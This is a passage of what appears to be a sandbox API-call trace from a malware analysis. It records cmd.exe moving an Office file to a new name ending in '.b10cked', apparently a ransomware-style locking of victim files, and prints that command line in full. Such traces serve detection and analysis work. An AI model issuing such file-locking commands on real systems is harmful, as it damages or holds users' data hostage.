0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = 
"\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 22259 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 22260 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 22261 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 22262 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 22263 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 22264 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 22265 start_va = 0x550000 end_va = 0x114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 22266 start_va = 0x1150000 end_va = 0x12b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Thread: id = 339 os_tid = 0xd68 [0161.690] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2afa34 | out: lpSystemTimeAsFileTime=0x2afa34*(dwLowDateTime=0x99c0efa0, dwHighDateTime=0x1d440a9)) [0161.690] GetCurrentProcessId () returned 0x90c [0161.690] GetCurrentThreadId () returned 0xd68 [0161.690] GetTickCount () returned 0x310e1 [0161.690] QueryPerformanceCounter (in: lpPerformanceCount=0x2afa2c | out: lpPerformanceCount=0x2afa2c*=21847923698) returned 1 [0161.691] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0161.691] __set_app_type (_Type=0x1) [0161.691] __p__fmode () returned 0x76b331f4 
[0161.691] __p__commode () returned 0x76b331fc [0161.691] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0161.691] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0161.691] GetCurrentThreadId () returned 0xd68 [0161.691] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd68) returned 0x38 [0161.691] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0161.691] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0161.691] SetThreadUILanguage (LangId=0x0) returned 0x409 [0161.691] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0161.691] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2af9c4 | out: phkResult=0x2af9c4*=0x0) returned 0x2 [0161.691] VirtualQuery (in: lpAddress=0x2af9fb, lpBuffer=0x2af994, dwLength=0x1c | out: lpBuffer=0x2af994*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.691] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2af994, dwLength=0x1c | out: lpBuffer=0x2af994*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0161.691] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2af994, dwLength=0x1c | out: lpBuffer=0x2af994*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0161.691] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2af994, dwLength=0x1c | out: lpBuffer=0x2af994*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, 
RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.692] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2af994, dwLength=0x1c | out: lpBuffer=0x2af994*(BaseAddress=0x2b0000, AllocationBase=0x2b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0161.692] GetConsoleOutputCP () returned 0x1b5 [0161.692] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0161.692] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0161.692] _get_osfhandle (_FileHandle=1) returned 0x7 [0161.692] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0161.692] _get_osfhandle (_FileHandle=1) returned 0x7 [0161.692] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0161.692] _get_osfhandle (_FileHandle=1) returned 0x7 [0161.692] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0161.692] _get_osfhandle (_FileHandle=0) returned 0x3 [0161.692] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0161.692] _get_osfhandle (_FileHandle=0) returned 0x3 [0161.692] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0161.693] GetEnvironmentStringsW () returned 0x90210* [0161.693] FreeEnvironmentStringsW (penv=0x90210) returned 1 [0161.693] GetEnvironmentStringsW () returned 0x90210* [0161.693] FreeEnvironmentStringsW (penv=0x90210) returned 1 [0161.693] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae934 | out: phkResult=0x2ae934*=0x40) returned 0x0 [0161.693] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae93c, lpData=0x2ae940, lpcbData=0x2ae938*=0x1000 | out: lpType=0x2ae93c*=0x0, lpData=0x2ae940*=0xa0, lpcbData=0x2ae938*=0x1000) returned 0x2 [0161.693] RegQueryValueExW (in: hKey=0x40, 
lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae93c, lpData=0x2ae940, lpcbData=0x2ae938*=0x1000 | out: lpType=0x2ae93c*=0x4, lpData=0x2ae940*=0x1, lpcbData=0x2ae938*=0x4) returned 0x0 [0161.693] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae93c, lpData=0x2ae940, lpcbData=0x2ae938*=0x1000 | out: lpType=0x2ae93c*=0x0, lpData=0x2ae940*=0x1, lpcbData=0x2ae938*=0x1000) returned 0x2 [0161.693] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae93c, lpData=0x2ae940, lpcbData=0x2ae938*=0x1000 | out: lpType=0x2ae93c*=0x4, lpData=0x2ae940*=0x0, lpcbData=0x2ae938*=0x4) returned 0x0 [0161.693] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae93c, lpData=0x2ae940, lpcbData=0x2ae938*=0x1000 | out: lpType=0x2ae93c*=0x4, lpData=0x2ae940*=0x40, lpcbData=0x2ae938*=0x4) returned 0x0 [0161.693] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae93c, lpData=0x2ae940, lpcbData=0x2ae938*=0x1000 | out: lpType=0x2ae93c*=0x4, lpData=0x2ae940*=0x40, lpcbData=0x2ae938*=0x4) returned 0x0 [0161.693] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae93c, lpData=0x2ae940, lpcbData=0x2ae938*=0x1000 | out: lpType=0x2ae93c*=0x0, lpData=0x2ae940*=0x40, lpcbData=0x2ae938*=0x1000) returned 0x2 [0161.693] RegCloseKey (hKey=0x40) returned 0x0 [0161.693] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae934 | out: phkResult=0x2ae934*=0x40) returned 0x0 [0161.693] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae93c, lpData=0x2ae940, lpcbData=0x2ae938*=0x1000 | out: lpType=0x2ae93c*=0x0, lpData=0x2ae940*=0x40, lpcbData=0x2ae938*=0x1000) returned 0x2 [0161.693] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae93c, 
lpData=0x2ae940, lpcbData=0x2ae938*=0x1000 | out: lpType=0x2ae93c*=0x4, lpData=0x2ae940*=0x1, lpcbData=0x2ae938*=0x4) returned 0x0 [0161.693] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae93c, lpData=0x2ae940, lpcbData=0x2ae938*=0x1000 | out: lpType=0x2ae93c*=0x0, lpData=0x2ae940*=0x1, lpcbData=0x2ae938*=0x1000) returned 0x2 [0161.693] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae93c, lpData=0x2ae940, lpcbData=0x2ae938*=0x1000 | out: lpType=0x2ae93c*=0x4, lpData=0x2ae940*=0x0, lpcbData=0x2ae938*=0x4) returned 0x0 [0161.693] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae93c, lpData=0x2ae940, lpcbData=0x2ae938*=0x1000 | out: lpType=0x2ae93c*=0x4, lpData=0x2ae940*=0x9, lpcbData=0x2ae938*=0x4) returned 0x0 [0161.694] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae93c, lpData=0x2ae940, lpcbData=0x2ae938*=0x1000 | out: lpType=0x2ae93c*=0x4, lpData=0x2ae940*=0x9, lpcbData=0x2ae938*=0x4) returned 0x0 [0161.694] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae93c, lpData=0x2ae940, lpcbData=0x2ae938*=0x1000 | out: lpType=0x2ae93c*=0x0, lpData=0x2ae940*=0x9, lpcbData=0x2ae938*=0x1000) returned 0x2 [0161.694] RegCloseKey (hKey=0x40) returned 0x0 [0161.694] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886383 [0161.694] srand (_Seed=0x5b886383) [0161.694] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.DLL.trx_dll.b10cked\"" [0161.694] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.DLL.trx_dll.b10cked\"" [0161.694] 
GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0161.694] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x91970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0161.694] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0161.694] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0161.694] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0161.694] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0161.694] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0161.694] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0161.694] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0161.694] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0161.694] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0161.694] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0161.694] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0161.694] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0161.695] GetEnvironmentStringsW () returned 0x92360* [0161.695] FreeEnvironmentStringsW (penv=0x92360) returned 1 [0161.695] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0161.695] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0161.695] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0161.695] 
_wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0161.695] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0161.695] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0161.695] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0161.695] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0161.695] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0161.695] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0161.695] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2af700 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0161.695] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2af700, lpFilePart=0x2af6fc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2af6fc*="Desktop") returned 0x18 [0161.695] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0161.695] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af47c | out: lpFindFileData=0x2af47c) returned 0x909f0 [0161.695] FindClose (in: hFindFile=0x909f0 | out: hFindFile=0x909f0) returned 1 [0161.695] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2af47c | out: lpFindFileData=0x2af47c) returned 0x909f0 [0161.696] FindClose (in: hFindFile=0x909f0 | out: hFindFile=0x909f0) returned 1 [0161.696] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2af47c | out: lpFindFileData=0x2af47c) returned 0x909f0 [0161.696] FindClose (in: hFindFile=0x909f0 | out: hFindFile=0x909f0) returned 1 [0161.696] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0161.696] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0161.696] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") 
returned 1 [0161.696] GetEnvironmentStringsW () returned 0x90210* [0161.696] FreeEnvironmentStringsW (penv=0x90210) returned 1 [0161.696] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0161.696] GetConsoleOutputCP () returned 0x1b5 [0161.697] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0161.697] GetUserDefaultLCID () returned 0x409 [0161.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0161.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2af840, cchData=128 | out: lpLCData="0") returned 2 [0161.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2af840, cchData=128 | out: lpLCData="0") returned 2 [0161.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2af840, cchData=128 | out: lpLCData="1") returned 2 [0161.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0161.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0161.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0161.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0161.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0161.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0161.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0161.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0161.697] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, 
lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0161.697] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0161.697] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0161.698] GetConsoleTitleW (in: lpConsoleTitle=0x80930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0161.698] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0161.698] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0161.698] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0161.698] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0161.699] _wcsicmp (_String1="move", _String2=")") returned 68 [0161.699] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0161.699] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0161.699] _wcsicmp (_String1="IF", _String2="move") returned -4 [0161.699] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0161.699] _wcsicmp (_String1="REM", _String2="move") returned 5 [0161.699] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0161.702] GetConsoleTitleW (in: lpConsoleTitle=0x2af538, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0161.703] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0161.703] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0161.703] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0161.703] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0161.703] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0161.703] _wcsicmp (_String1="move", _String2="CD") returned 10 [0161.703] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0161.703] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0161.703] _wcsicmp (_String1="move", _String2="REN") returned -5 [0161.703] 
_wcsicmp (_String1="move", _String2="ECHO") returned 8 [0161.703] _wcsicmp (_String1="move", _String2="SET") returned -6 [0161.703] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0161.703] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0161.703] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0161.703] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0161.703] _wcsicmp (_String1="move", _String2="MD") returned 11 [0161.703] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0161.703] _wcsicmp (_String1="move", _String2="RD") returned -5 [0161.703] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0161.703] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0161.703] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0161.703] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0161.703] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0161.703] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0161.703] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0161.703] _wcsicmp (_String1="move", _String2="VER") returned -9 [0161.703] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0161.703] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0161.703] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0161.703] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0161.703] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0161.703] _wcsicmp (_String1="move", _String2="START") returned -6 [0161.703] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0161.704] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0161.704] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0161.705] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0161.705] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0161.705] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2af2f4, nVolumeNameSize=0x104, 
lpVolumeSerialNumber=0x2af2ec, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2af2ec*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0161.705] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0161.705] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0161.705] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0161.705] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0161.705] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0161.705] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0161.705] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0161.705] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0161.705] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0161.705] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0161.705] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0161.705] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0161.706] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0161.706] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0161.706] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0161.706] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0161.706] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0161.706] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0161.706] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned 
-13 [0161.706] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0161.706] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0161.706] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0161.706] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0161.706] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0161.706] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0161.706] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0161.706] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0161.706] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0161.706] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0161.706] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0161.706] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0161.706] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0161.706] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0161.706] _wcsicmp (_String1="XLINTL~1.TRX", _String2=".") returned 74 [0161.706] _wcsicmp (_String1="XLINTL~1.TRX", _String2="..") returned 74 [0161.706] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\xlintl~1.trx")) returned 0x2020 [0161.707] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x91f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0161.707] SetErrorMode (uMode=0x0) returned 0x0 [0161.707] SetErrorMode (uMode=0x1) returned 0x0 [0161.707] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~1.TRX", nBufferLength=0x104, lpBuffer=0x2aec7c, 
lpFilePart=0x2aec64 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~1.TRX", lpFilePart=0x2aec64*="XLINTL~1.TRX") returned 0x3c [0161.707] SetErrorMode (uMode=0x0) returned 0x1 [0161.707] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0161.707] _wcsicmp (_String1="XLINTL~1.TRX", _String2=".") returned 74 [0161.707] _wcsicmp (_String1="XLINTL~1.TRX", _String2="..") returned 74 [0161.707] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\xlintl~1.trx")) returned 0x2020 [0161.707] SetErrorMode (uMode=0x0) returned 0x0 [0161.707] SetErrorMode (uMode=0x1) returned 0x0 [0161.707] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~1.TRX", nBufferLength=0x104, lpBuffer=0x2af0f8, lpFilePart=0x2aee90 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~1.TRX", lpFilePart=0x2aee90*="XLINTL~1.TRX") returned 0x3c [0161.707] SetErrorMode (uMode=0x0) returned 0x1 [0161.707] SetErrorMode (uMode=0x0) returned 0x0 [0161.707] SetErrorMode (uMode=0x1) returned 0x0 [0161.707] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x2af300, lpFilePart=0x2aee90 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.DLL.trx_dll.b10cked", 